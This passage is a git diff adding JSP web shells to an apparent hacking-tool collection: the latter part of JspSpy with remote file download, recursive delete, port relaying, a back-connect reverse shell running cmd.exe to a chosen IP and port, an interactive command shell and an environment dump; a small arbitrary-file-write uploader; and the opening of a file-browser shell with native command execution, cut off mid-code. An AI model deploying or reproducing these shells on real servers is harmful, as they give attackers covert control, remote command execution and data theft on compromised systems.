    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//?????? +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/minupload.jsp b/jsp/hackk8/JSP/minupload.jsp new file mode 100644 index 0000000..3994c00 --- /dev/null +++ b/jsp/hackk8/JSP/minupload.jsp @@ -0,0 +1,48 @@ + + <%@page contentType="text/html;charset=utf-8"%> + <%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { //这小马有问题 上传jsp就出错 + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("上传成功!"); + } catch (FileNotFoundException ex2) { + out.println("上传失败!"); + } catch (IOException ex) { + out.println("上传失败!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("上传失败!"); + } + } + } + %> +
    + 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> +
    +
    + 上传文件路径:"> +
    +
    + 上传文件内容: +
    +
    + +
    + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/other/download.jsp b/jsp/hackk8/JSP/other/download.jsp new file mode 100644 index 0000000..85c73d1 --- /dev/null +++ b/jsp/hackk8/JSP/other/download.jsp @@ -0,0 +1,1913 @@ +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to 